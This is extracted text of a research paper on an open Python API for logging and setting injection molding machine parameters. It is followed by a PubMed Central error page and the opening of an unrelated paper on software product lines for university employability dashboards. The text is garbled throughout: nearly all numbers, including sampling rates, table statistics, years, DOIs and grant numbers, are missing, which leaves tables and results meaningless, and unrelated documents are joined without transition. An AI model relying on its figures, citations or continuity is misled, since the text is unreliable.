process data collection and openness of some of the mes systems used by the injection molding companies. there are, other systems available on the market, however, most of them are similar to each other in a sense that their functionality misses either (a) openness for changes and addition of custom modules developed by the system’s users and not only developers, (b) synchronized acquisition of data from both machine and d party sensors or (c) ability to adjust the sampling rate. the functionality of the available systems could be adjusted to enable realization of (a)–(c), thereby enabling a new use-case of the commercially available systems making them more open and flexible for research and development purposes. when it comes to the solutions proposed by academia, the authors have found only a few examples of the development of open apis capable of solving the above-described challenges. the literature, however, does include examples of systems for the acquisition of data from sensors additionally installed on the imms, and descriptions of rapid testing of novel algorithm prototypes. in (tellaeche & arana, ) a ‘‘flexible data acquisition system that allows rapid implementation of complex algorithms to assess their correct performance and can be integrated in the quality control process’’ is proposed. the system is based on one of national instruments (ni) data acquisition systems (daqs) and is used to log data from two force sensors installed in a mold. no data from in-built machine sensors are being used in this study, due to the inability to access it. a similar case is described in (zhou et al., ), where mold temperature, screw displacement and velocity data are recorded through the installation of additional (not provided by machine manufacturer) sensors in the imm, as well as the mold. in zhao et al. ( ), different types of sensors and probes (thermocouples, displacement and pressure probes) are installed in an injection molding machine and data collection cards are used to transform analog, discrete and temperature signals to the digital ones. most of this data can be acquired from sensors already installed in an imm by its manufacturer, but due to the restriction of commercial software and hardware, new sensors needed to be installed to get easy access to data and to test necessary algorithms and routines developed by researchers. zhang, mao (zhang et al., ), on the other hand, are trying to use some of machine built-in sensors, namely hydraulic pressure sensor to estimate nozzle pressure values and increase controllability of the injection molding process. in (charest, finn & dubay, ) pressure transducers, thermocouples, velocity and position sensors, and flow sensors are installed and ‘‘interfaced using national instruments data acquisition boards and a pc’’ to acquire the imm data. most of these reported studies use systems for data acquisition from d party sensors, and are not using the machine built-in sensors, due to the lack of a suitable way to acquire the data and communicate with the imm controller. development of an open api for the ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of commercial mes. requirement tig authentig (kraussmaffei, ) kraussmaffei maxecution (kraussmaffei, ) aurburg host computer system (als) (arburg, ) mes hydra (mdpv, ) sap manuacturing execution (sap, ) polmak plastik qmaster (polmak_plastik, ) open for changes and addition of modules by the user (not producer) no no no no yes (mostly for business applications) no compatibility with euromap , eu- romap , emi yes no yes yes yes yes acquisition of machine and process parameters yes yes yes yes yes yes set values of machine and process pa- rameters yes yes yes yes yes yes synchronized acquisition of data from built-in and additional sensors no no no no no no possibility to change sampling rate no no no no no yes o gorodnyk etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. imms by either mes producers or academia would bring new opportunities for research and analysis of the machine and process data. requirements to an open application programming interface for imms based on the above-described challenges to the commercially available mes, as well as on the project proposal related to this research certain functional requirements were formulated: . the api should be compatible with different communication protocols (euromap , euromap , emi). . the interface should be open so that building upon existing software and rapid algorithm prototyping is possible if/when necessary. . the api should be capable of providing real-time or soft real-time logging depending on the end-user’s needs. real-time scheduling communication means that missing a data sampling deadline (each . s, for example) is considered an error, while soft real-time means that it is better not to miss the deadline, but it is not an error to do so (lee & seshia, ). in case of the prototype further described in this article, a soft real-time logging and a hz sampling rate were required to be implemented based on the stakeholders’ requirements extracted from the related project proposal. . the acquisition of several parameter measurements per production cycle should be ensured. . it should be possible to get values of up to desired machine and process parameters of an imm (depending on the imm’s model) and additionally installed sensors (if any). . the option of setting values of machine and process parameters, where the parameters are accessible, should be provided. . the setting of the values should not conflict with the imm safety installations and non-permitted values that are too high or too low shall not be overwriting the permitted ones. . the developed system should ensure the synchronized acquisition of data from machine built-in sensors and d party sensors. in case of the prototype solution, logging of data from the imm’s built-in sensors should be synchronized with temperature and pressure mold multi-sensors. in addition, such non-functional requirement as security needs to be considered. api implementations should ideally allow application layer security—such as authenticated access over secure http via tls, but this aspect is out of scope for this work. to sum up: a simple, open and safe application programming interface (api) which can get and set values of different parameters on the imm, as well as values from additionally installed/external sensors, should be developed. to meet the above-listed requirements the api needs to include the functions/ methods shown in table . design and implementation of the api’s prototype an api is a software product that includes a number of clearly defined methods for communication between different components, in our case, between an imm, a pc ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table ‘‘parameterlist’’ description. name of method description of method start_logging(sampling_rate) by executing this method the system starts logging imm’s process parameters with specified by a user sampling rate. ‘‘sampling_rate’’ parameter is the user-desired sampling rate in hz. the logging sequence is stopped by launching the idle() method. get_process_param(names) this method returns actual and set values of chosen process parameter or list of parameters. parameter name(s) is/are given as ‘‘names’’ argument of the method. this method is independent of the control loop. get_async_act_sample(params) returns unsynchronized current value(s) of process parameter(s). name of one or more parameters are given as ‘‘params’’ argument of the method. method is independent of the control loop. set_process_param(name,value) this method sets a desired value of a specified process parameter on the imm. arguments ‘‘name’’ and ‘‘value’’ mean respectively process parameter’s name and desired value of that parameter. get_samples(number_of_shots) method returns data sampled during certain number of production cycles (shots) buffered in a fifo queue. ‘‘number_of_shots’’ parameter defines how many shots/cycles in the past user is interested in. event() set api’s state to an event, can be launched externally with method event_sample(). event_sample() trigger an event based sampling. the state has to be an event. idle() set interface’s state to idle, a passive state where the connection is maintained. disconnect() connection is ended and the api is shut down. and/or a data acquisition system connected to mold sensors. to develop the proposed api prototype, the unified process methodology for software development has been followed. this methodology includes four main phases: inception, elaboration, construction and transition (jacobson, booch & rumbaugh, ). the python programming language was chosen to program all the prototype modules, as it is easy to use, has a number of versatile features and libraries, can be utilized to practice distributed computing and be further extended in c++ or c. the imm used in this study supports euromap and emi data exchange protocols. as mentioned before, emi is capable of exchanging data significantly faster than euromap , therefore, it was selected to be used in the prototype implementation. pcmef (presentation, control, domain and foundation) architectural framework (maciaszek & liong, ; madeyski & sochmialek, ) was applied for development of the api prototype’s distributed architecture. at the same time, the osi layer model (open systems interconnection model) (kurose & ross, ) was followed for the creation of the communication design of the api, since the emi exchange protocol is also based on this model. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure open api for imm architecture diagram. full-size doi: . /peerjcs. /fig- description of the proposed system the proposed prototype api includes database and system apis, which combines imm interface and data acquisition system for additional sensors (daq interface) modules, as shown in fig. . the system api is used ( ) for the establishment of a connection with the injection molding machine and requesting and setting the corresponding parameter values, ( ) for acquisition of data from any additionally installed machine and mold sensors. note that the data from the imm is only accessed through establishment of connection with the imm and not acquired directly from the imm sensors. this is due to a fact that the imm has its own daq that is connected to the installed sensors and is logging their values during the machine runs. the database is needed for organized storage and easy access to sampled data. the api prototype the api prototype uses pyro (pyro, ), xml.etree.elementtree, socket, thread, queue and datetime python libraries, where pyro is python remote objects library that is used to enable distributed computing between network-based objects. the data is logged only when the machine mold is closed in order to minimize the amount of memory used for data storage. to detect the mold closing, a ‘‘mold force’’ parameter is used. the software unit waits until the mold force parameter reaches a value of ≥ kn and then starts data collection. it stops when the mold force parameter value becomes lower than the above-specified value. currently, data from each production cycle (in this case defined as from mold closing to mold opening) are written to a separate file of a user-specified type (.csv, .json, .pickle) and are stored in a folder chosen by a user on the pc connected to the imm. a proper database management unit needs to be further developed and added to the system in future versions, to provide a scalable way of storing process data. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. accessing the imm parameters data to access the necessary imm parameter values the prototype uses a list of uniform resource identifiers (uris) and their correspondence to different parameters on the imm for the establishment of machine to machine communication. the uris list was obtained from private communication with engel. a .csv file was created that included all uris and machine and process parameters of the imm provided by engel. this file can be updated to enable or disable the collection of certain parameters depending on the necessities of a user. the api prototype can enable three different modes ‘‘idle’’, ‘‘fixed cycles’’ and ‘‘flexible cycles’’ depending on the application. in the ‘‘idle’’ mode controller ensures that connection is up and that application is able to access the interface’s methods for asynchronous interaction, while the ‘‘fixed cycles’’ mode is a periodical sampling mechanism of parameters from the imm that samples all of the parameters simultaneously. the sampling results are available in the queue for the application process. ‘‘flexible cycles’’ mode takes care of the unbalanced update sampling frequencies to avoid oversampling. machine parameters on the imm can have different update frequencies depending on the sampling limitations of the data acquisition system on the imm. these frequencies can also be manipulated by the user via the imm’s general user interface. the updating frequencies typically vary from to ms. at the first run in the ‘‘flexible cycles’’ mode, the interface acquires the sampling frequency of each parameter from the imm and groups parameters that have the same update rate. in this mode, the interface checks the last datetime, when each parameter group was updated, and determines if it is time to acquire a new portion of data from the imm. acquisition of additional sensors data when it comes to acquisition of data from sensors additionally installed on an imm or in its molds, the data logging is synchronized. in order to enable the synchronization, the event_sample() method described in table needs to be triggered for both imm and the daq used for the additional sensors data sampling. this study included the use of a mold with two pressure and temperature multi-sensors. figure depicts a typical scenario of the api’s use and interaction of its components, where the necessary parameters data is accessed on the imm and logged from the additional sensors through the revpi. communication with an imm is established through the immproxy module and the d party sensors daq though the daqproxy and the requested parameter values are obtained. evaluation of the api prototype’s performance used hardware in order to develop and test that the application programming interface is able to satisfy requirements specified in ‘‘requirements to an open application programming interface for imms’’, an ‘‘engel insert ’’ vertical injection molding machine with cc control unit was used. a mold for iso - (iso, ) dog bone parts ( mm thickness) with two temperature and pressure kistler multi-sensors type b h p was used to test the ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interaction sequence diagram showing ordering of calls to the api and underlying calls for data acquisition. full-size doi: . /peerjcs. /fig- system’s performance with different sampling rates. the sensors’ characteristics are shown in table . the dog bone specimen parts (fig. ) are mostly used to define mechanical properties of various materials and are used by both industry and academia for those purposes. to transform analog signals from sensors into digital ones a revpi (revpi, b)— industrial raspberry pi is used, namely revpi core and revpi analog input output (aio) modules. revpi core is a computing unit that uses raspbian jessie as the operating system and preempt-rt patched kernels of version . . -rt -v . revpi aio is an analog input/output extension module for the revpi core which includes necessary analog inputs and outputs to connect to the sensors and to send converted sensor signals to the core unit. the modules are connected through pibridge (revpi’s modules connector). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dog bone specimen (iso - ) with mm thickness. full-size doi: . /peerjcs. /fig- table pressure and temperature sensor characteristics. specifications kistler type b h p model measuring chain calibration calibrated by kistler measuring range pressure (bar) .. measuring range temperature (◦c) .. temperature accuracy (◦c) ± diameter (mm) height (mm) . natural frequency (khz) > the revpi aio performs analog-to-digital conversion (adc) with a -bit delta-sigma converter (baker, ) (model ads ) (revpi, a). the reason for choosing revpi is that, unlike commercial daqs from manufacturers like ni and hbm, revpi has a significantly lower cost and is an open, modular industrial ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table statistics of overhead measurement for revpi. sampling rate [hz] mean [s] std. dev. [s] th percentile th percentile overhead over . s [%] . . . . . . . . . . . . . . . . . . . . table statistics of overhead measurement for imm daq. sampling rate [hz] mean [s] std. dev. [s] th percentile th percentile overhead over . s [%] . . . . . . . . . . . . . . . . . . . . pc (revpi, b). due to this, it can provide flexibility in which software alternatives can be used together with it. the biggest disadvantage in comparison to commonly used commercial data acquisition systems is revpi aio’s maximum sampling rate at hz. in practice, the sampling rate can be significantly lower due to load on the pibridge. further on, the update rate of the data values is reduced by a factor of according to the documentation of the revpi. as a result, if the analog-to-digital conversion sampling rate is hz, it will provide an update rate of hz on revpi core . due to this revpi might not be the optimal solution, however, as the described api is a prototype, revpi is a good demonstration tool. system’s performance in terms of real-time and soft real-time logging in order to assess the system’s performance in terms of its ability to comply with different sampling rates, the api was installed on the revpi, where three different processes needed to be handled: handling the imm, handling kistler sensors signals and synchronization of data acquisition from the injection molding machine and mold sensors. all tests were conducted at length of samples for sampling rates at , , and hz. the imm machine was turned on and the revpi was connected to the mold sensors, however, no imm production runs were performed, therefore, most of the parameter values logged are constant or equal to zero. the ability of the system to set the corresponding machine parameter values was not tested during these tests. the collected data can be found in the supplemental files. tables and show the mean, standard deviation, th and th percentiles, as well as the percentage of samples with overhead over . s among the logged sampling rates, while fig. depicts histograms for the corresponding sampling rates data. the overhead was calculated based on the following equation: overhead = ( sampling_rate(real)n+ −sampling_rate(real)n ) −sampling_rate(given), ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure histograms showing observed times for sampling at different rates. (a) daq hz. (b) imm hz. (c) daq hz. (d) imm hz. (e) daq hz (f) imm hz. (g) daq hz (h) imm hz. full-size doi: . /peerjcs. /fig- ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where sampling_rate(real) is a sampling rate performed by the system for samples n+ and n. based on the results shown in tables and , it is easy to see that real-time restrictions of the system apply. for the test with hz sampling rate, the mean sampling rates that the system performs are around . s ( . hz) on both imm and the revpi. this means that the system cannot comply with the given sampling rate. examining results from sampling at hz, it is possible to see that the system performs better than with hz sampling rate. in this case, the performed mean sampling rate is around . s ( . hz) (for both imm and the revpi). even better results can be seen at sampling rate at hz. here, the average sampling is close to . s or . hz, while the number of overhead values over . s is . and . for the revpi and the imm’s daq respectively. this indicates that hz can be one of the appropriate sampling rates for the proposed api. at the same time, hz sampling rate has the mean value for both imm and the revpi at around . s ( . hz). on the imm there are . % of samples that have the overhead value higher than . s, while on the revpi there are none. regarding real-time demands, results show that a number of samples with the overhead value higher than . s are present at logging with any of the tested sampling rates except for the hz rate for the revpi. this happens because the system tries to compensate for the sampling deviation, when launched in the ‘‘flexible cycles’’ mode to avoid oversampling. the revpi demonstrates that it is able to perform real-time sampling with hz or lower sampling rate and soft real-time on higher speeds. to improve the system’s performance in term of the real-time performance a more powerful daq needs to be used. at the same time, api’s unpredictability comes, among other things, from python’s memory management mechanism. it uses reference counting collector and generational garbage collector, known as ‘‘gc module’’ for memory reclaim (pythonsoftwarefoundation, ). unlike many other languages, it does not necessarily release the memory back to the operating system, but instead keeps some parts of already allocated memory for use in the future. it is also possible to see that the imm process is more unpredictable than the revpi process. this is caused by necessity to establish the server/client connection with the imm, while there is no such necessity, when the revpi is directly connected to the sensors and acquires the data from them. it is important to remember that the revpi is used to access and record the imm’s parameter values, while their acquisition is performed by the imm’s internal daq, and only the mold sensors are directly connected and the corresponding signals are logged by the revpi. discussion and future work the developed api prototype complies with requirements that were defined in ‘‘requirements to an open application programming interface for imms’’ and is a modular system open for any necessary changes. its openness is the main difference between the proposed api and commercially available systems with similar functionality. it is possible to see from table that listed commercial mes (except sap manufacturing ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. execution (sap. sap manufacturing execution, )) do not include the possibility of adding any modules developed by the system’s user, unless a new module is bought from the software producer. at the same time, they also do not allow to change parameters sampling rate and synchronization of data acquisition from built-in or external sensors. the open api prototype, on the other hand, can be modified to include additional modules. the use of these modules can assist in increasing the quality yield and the overall controllability of the injection molding process. the open application programming interface is developed to simplify data collection and processing for optimization of the injection molding process and bring imms closer to being cyber-physical systems capable of self-regulation and self-control. keeping in mind operational safety, it should be noted that the prototype does not in any way hinder operation of the imm’s own control system. as a result, if a parameter value that contradicts with the imm manufacturers’ safety principles is attempted to be set, the value will not be updated on the imm. at the same time, if a value is updated, in some cases, it might take time to reach the new stationary set point on the imm. at the moment, the proposed prototype does not check if the imm has reached the new value and this needs to be controlled by the imm operator/user. future work should include development of the corresponding classes for the prototype’s use with other data exchange protocols, such as euromap to enable connection to imms of other manufacturers; testing of the system with other injection molding machines; further development of the database management unit to allow storage of all the necessary process data. development of the prototype in terms of the real-time monitoring through implementation of the specialized process architecture (for example, non-blocking queues, concurrent read/write buffers) also needs to be continued. at the same time, a graphical user interface (gui) or a connector to an existing industry . process monitoring platform for the api needs to be implemented. the system’s security also needs to be worked on. in addition, a question of how often the data should be sampled needs further and deeper review. collaboration with imm manufacturers, as well as opc/ua working group would be highly beneficial for further development of the open api for imms and the injection molding process compliance with industry . paradigms. adding functionality of the proposed api to the commercially available mes would make them attractive to a broader range of users, including those interested in extensive research and analysis of the injection molding process. an important aspect of industry . is simplification of the integration and the communication across different units and machines at the shop floor (negri, fumagalli & macchi, ; kritzinger et al., ). a major motivation for the development of the api, is the possibility to enable easy access to machine tool and process parameters data during injection molding for several categories of imm users. in order to move towards industry . , both hardware and software should become more open (without compromising systems security and operational safety) for additional modifications by users instead of staying as restricted as it is. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. summary this paper has provided requirements, description of the development and capabilities of the open api prototype for injection molding machines. the interface is open for external interaction with the machine controller, allowing logging and setting values of process parameters. the openness of the prototype also provides possibilities for rapid algorithm prototyping and testing, when developing control strategies in the laboratory. the prototype has been tested at , , and hz sampling frequencies and can comply with the and hz rates. setting of the machine parameters, however, has not been performed during these tests. as to the authors’ knowledge, there are currently no such open systems available. similar functionality might be provided by commercially available mes, but these systems often have several limitations, such as: high cost, synchronization issues of data logged from injection molding machine and additional sensors, etc. the api prototype proposed in this paper is developed to provide soft real-time data communication between a pc and an imm through emi data exchange protocol, as well as allow connection with revpi for data acquisition from sensors installed in a mold. even though revpi has some advantages in terms of cost, openness and high flexibility, its main disadvantage is the low sampling rate and a more powerful daq might be necessary to acquire data with higher sampling rates. the interface delivers the possibility of logging up to machine and process parameters and allows building upon the api to integrate necessary data processing algorithms or other modules. the system has been developed using python programming language and is open for changes, such as adding euromap or other desirable data exchange protocols. distributed computing can be practiced with the help of this api to provide additional flexibility and robustness. the prototype is inspired by concepts of industry . and cyber-physical systems. the developed api prototype is based on necessity to move towards implementation of industry . and cyber-physical systems. the authors hope that it will be able to provide the necessary flexibility for rapid prototyping of methods and algorithms that can lead to enhancement of injection molding machines’ capabilities related to self-optimization and control. additional information and declarations funding this work was supported by the norwegian research council as part of the ‘‘megamould’’ project (project number: ) and through the sfi manufacturing project (project number: ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: norwegian research council as part of the ‘‘megamould’’ project: . sfi manufacturing project: . ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests mats larsen is a research scientist at sintef manufacturing and ole vidar lyngstad is a research director at sintef manufacturing. author contributions • olga ogorodnyk and mats larsen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ole vidar lyngstad conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • kristian martinsen conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available on github: https://github.com/sintefmanufacturing/imm_api supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ageyeva t, horváth s, kovács jg. . in-mold sensors for injection molding: on the way to industry . . sensors ( ): doi . /s . arburg. . host computer system (als). available at https://www.arburg.com/en/ products-and-services/injection-moulding/production-management/host-computer- system-als/ (accessed on june ). baker b. . how delta-sigma adc work, part . dallas, texas, usa: texas instru- ments incorporated. charest m, finn r, dubay r. . integration of artificial intelligence in an injection molding process for on-line process parameter adjustment. in: annual ieee international systems conference (syscon). piscataway: ieee. euromap. . euromap –data exchange interface between injection moulding machines and mes. available at https://opcfoundation.org/markets-collaboration/ plastics-and-rubber-machinery/ (accessed on june ). iso. . iso - : plastics –determination of tensile properties –part : test conditions for moulding and extrusion plastics. available at https://www.iso.org/ standard/ .html (accessed on june ). jacobson i, booch g, rumbaugh j. . the unified process. ieee software ( ): – . kraussmaffei. . maxecution. available at https://km.kraussmaffei.com/imm-en/ maxecution.html (accessed on june ). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sintefmanufacturing/imm_api http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://km.kraussmaffei.com/imm-en/maxecution.html https://km.kraussmaffei.com/imm-en/maxecution.html http://dx.doi.org/ . /peerj-cs. kritzinger w, karner m, traar g, henjes j, sihn . . digital twin in manufac- turing: a categorical literature review and classification. ifac-papersonline ( ): – . kurose jf, ross kw. . computer networking: a top-down approach. boston: pearson addison wesley. kurt m, kamber os, kaynak y, atakok g, girit o. . experimental investigation of plastic injection molding: assessment of the effects of cavity pressure and mold tem- perature on the quality of the final products. materials & design ( ): – doi . /j.matdes. . . . kurt m, kaynak y, kamber os, mutlu b, bakir b, koklu u. . influence of mold- ing conditions on the shrinkage and roundness of injection molded parts. the international journal of advanced manufacturing technology ( – ): – doi . /s - - -x. lee j, kao ha, yang sh. . service innovation and smart analytics for industry . and big data environment. product services systems and value creation: proceedings of the th cirp conference on industrial product-service systems : – . lee ea, seshia sa. . introduction to embedded systems: a cyber-physical systems approach. cambridge, massachusetts london, england: mit press. maciaszek l, liong bl. . practical software engineering: an interactive case-study approach to information systems development. boston: pearson addison wesley. madeyski l, sochmialek m. . architectural design of modern web applications. foundations of computing decision sciences ( ): – . mahmoud mi, hassan ammar h, hamdy mm, hassan eissa m. . production operation management using manufacturing execution systems (mes). in: th international computer engineering conference (icenco). ieee. mdpv. . manufacturing execution system hydra. available at https://www.mpdv. com/en/products-solutions/mes-hydra/#c - (accessed on july ). negri e, fumagalli l, macchi m. . a review of the roles of digital twin in cps-based production systems. procedia manufacturing : – doi . /j.promfg. . . . ogorodnyk o, martinsen k. . monitoring and control for thermoplastics injection molding a review. procedia cirp : – doi . /j.procir. . . . osswald ta, hernandez-ortiz jp. . polymer processing modeling and simulation. munich: carl hanser verlag, . polmak_plastik. . polmak plastik products. available at https://www.polmakplastik. com/en/productsdetail-manufacturing-execution-systems-mes-products- .html (accessed on july ). pyro. . python remote objects - . . available at https://pypi.org/project/pyro / (accessed on june ). python software foundation. . gc - garbage collector interface. available at https: //docs.python.org/ /library/gc.html (accessed on june ). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.matdes. . . http://dx.doi.org/ . /s - - -x https://www.mpdv.com/en/products-solutions/mes-hydra/#c - https://www.mpdv.com/en/products-solutions/mes-hydra/#c - http://dx.doi.org/ . /j.promfg. . . http://dx.doi.org/ . /j.procir. . . https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products- .html https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products- .html https://pypi.org/project/pyro / https://docs.python.org/ /library/gc.html https://docs.python.org/ /library/gc.html http://dx.doi.org/ . /peerj-cs. revpi. a. how to configure analog input. available at https://revolution.kunbus.com/ tutorials/uebersicht-aio- /analoge-eingaenge-konfigurieren- / (accessed on july ). revpi. b. industrial raspberry pi. available at https://revolution.kunbus.com/ revolution-pi-series/ (accessed on june ). saldivar aaf, goh c, li y, yu h, chen y. . attribute identification and predictive customisation using fuzzy clustering and genetic search for industry . environ- ments. in: software, knowledge, information management & applications (skima), th international conference on. ieee. sap. . sap manufacturing execution. available at https://www.sap.com/products/ execution-mes/technical-information.html#extensibility (accessed on july ). tellaeche a, arana r. . rapid data acquisition system for complex algorithm testing in plastic molding industry. international journal of mechanical, aerospace, industrial, mechatronic and manufacturing engineering ( ): – . tig. . tig authentig. available at https://www.tig-mes.com/en/software/tig- authentig/ (accessed on may ). vrabič r, kozjek d, butala p. . knowledge elicitation for fault diagnostics in plastic injection moulding: a case for machine-to-machine communication. cirp annals ( ): – doi . /j.cirp. . . . yin s, ding sx, xie x, luo h. . a review on basic data-driven approaches for industrial process monitoring. ieee transactions on industrial electronics ( ): – doi . /tie. . . zhang y, mao t, huang z, gao h, li d. . a statistical quality monitoring method for plastic injection molding using machine built-in sensors. the inter- national journal of advanced manufacturing technology ( – ): – doi . /s - - - . zhao p, zhou h, he y, cai k, fu j. . a nondestructive online method for monitor- ing the injection molding process by collecting and analyzing machine running data. the international journal of advanced manufacturing technology ( – ): – doi . /s - - - . zheng r, tanner ri, fan x-j. . injection molding: integration of theory and modeling methods. berlin, heidelberg: springer science & business media. zhou x, zhang y, mao t, zhou h. . monitoring and dynamic control of quality stability for injection molding process. journal of materials processing technology : – doi . /j.jmatprotec. . . . ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://revolution.kunbus.com/tutorials/uebersicht-aio- /analoge-eingaenge-konfigurieren- / https://revolution.kunbus.com/tutorials/uebersicht-aio- /analoge-eingaenge-konfigurieren- / https://revolution.kunbus.com/revolution-pi-series/ https://revolution.kunbus.com/revolution-pi-series/ https://www.sap.com/products/execution-mes/technical-information.html#extensibility https://www.sap.com/products/execution-mes/technical-information.html#extensibility https://www.tig-mes.com/en/software/tig-authentig/ https://www.tig-mes.com/en/software/tig-authentig/ http://dx.doi.org/ . /j.cirp. . . http://dx.doi.org/ . /tie. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jmatprotec. . . http://dx.doi.org/ . /peerj-cs. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ none submitted november accepted june published july corresponding author andrea vázquez-ingelmo, andreavazquez@usal.es academic editor helen petrie additional information and declarations can be found on page doi . /peerj-cs. copyright vázquez-ingelmo et al. distributed under creative commons cc-by . open access taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability andrea vázquez-ingelmo , francisco j. garcía-peñalvo and roberto therón , grial research group, department of computer science and automatics, university of salamanca, salamanca, spain visusal research group, department of computer science and automatics, university of salamanca, salamanca, spain abstract university employment and, specifically, employability has gained relevance since research in these fields can lead to improvement in the quality of life of individual citizens. however, empirical research is still insufficient to make significant decisions, and relying on powerful tools to explore data and reach insights on these fields is paramount. information dashboards play a key role in analyzing and visually exploring data about a specific topic or domain, but end users can present several necessities that differ from each other, regarding the displayed information itself, design features and even functionalities. by applying a domain engineering approach (within the software product line paradigm), it is possible to produce customized dashboards to fit into particular requirements, by the identification of commonalities and singularities of every product that could be part of the product line. software product lines increase productivity, maintainability and traceability regarding the evolution of the requirements, among other benefits. to validate this approach, a case study of its application in the context of the spanish observatory for university employability and employment system has been developed, where users (spanish universities and administrators) can control their own dashboards to reach insights about the employability of their graduates. these dashboards have been automatically generated through a domain specific language, which provides the syntax to specify the requirements of each user. the domain language fuels a template-based code generator, allowing the generation of the dashboards’ source code. applying domain engineering to the dashboards’ domain improves the development and maintainability of these complex software products given the variety of requirements that users might have regarding their graphical interfaces. subjects human–computer interaction, software engineering keywords spl, dsl, domain engineering, dashboards, employability, code generation how to cite this article vázquez-ingelmo a, garcía-peñalvo fj, therón r. . taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:andreavazquez@usal.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction the concept of employability has increasingly gained relevance over the last decades. there is a reason: knowing which factors increase the possibility to obtain a job or to perform better in current job positions could be decisive to improve individual and collective life quality. however, this concept is still far away from having a straightforward definition (chadha & toner, ). as the literature suggests, employability can be seen as a capability to gain employment or as a set of skills and knowledge required to perform effectively in the workplace, among other definitions (universities uk & confederation of british industry, ; hillage & pollard, ; yorke, ). this lack of consensus when defining employability makes the research in this field a complicated task, given the fact that the definition of its factors depends on the perspective used to evaluate it, as well as the socioeconomic context in which employability and employment studies are framed. for these reasons, nowadays research on employability asks for an exploratory approach, to build stronger theoretical foundations. researching on employability has many potential benefits, aiming not only at knowing the variables that affect the capability to gain employment and have a successful work career, but also to exploit this knowledge to help policymakers and institutions with their missions. this knowledge can contribute to the creation of greater policies, focusing on the detected factors to enhance people’s chances to obtain better employment. specifically, educational institutions like universities could benefit from this knowledge. these institutions play a vital role regarding the employability of individuals (garcía-peñalvo, ), as they are in charge of transmitting knowledge and a series of skills to their students. by promoting the most relevant skills and capabilities that affect employability, it could be possible to increase the alignment of education with the labor market. however, generating knowledge in such a study field is not a trivial task. as it has been introduced, there could be several variables involved in the research of students’ employment and employability, so it is necessary to collect significant data volumes to be able to reach valuable insights. in addition to data collection, performing data analysis (albright, winston & zappe, ) is required to be able to reach useful insights. it is worth noting that analyzing employability data to identify and understand its factors 